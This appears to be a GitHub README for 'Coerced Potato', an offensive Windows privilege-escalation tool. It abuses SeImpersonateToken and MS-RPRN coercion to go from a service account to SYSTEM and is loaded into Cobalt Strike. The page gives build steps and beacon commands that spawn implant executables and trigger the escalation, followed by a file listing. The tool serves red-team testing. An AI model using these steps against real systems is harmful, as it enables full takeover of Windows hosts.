Coerced Potato Reflective DLL

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
IDL_FILES		IDL_FILES
dist		dist
images		images
lib		lib
rpc_interfaces		rpc_interfaces
Arguments.cpp		Arguments.cpp
Arguments.h		Arguments.h
CoerceFunctions.cpp		CoerceFunctions.cpp
CoerceFunctions.h		CoerceFunctions.h
CoercedPotato.cpp		CoercedPotato.cpp
CoercedPotato.sln		CoercedPotato.sln
CoercedPotato.vcxproj		CoercedPotato.vcxproj
CoercedPotato.vcxproj.filters		CoercedPotato.vcxproj.filters
CoercedPotato.vcxproj.user		CoercedPotato.vcxproj.user
README.md		README.md
ReflectiveDLLInjection.h		ReflectiveDLLInjection.h
ReflectiveLoader.cpp		ReflectiveLoader.cpp
ReflectiveLoader.h		ReflectiveLoader.h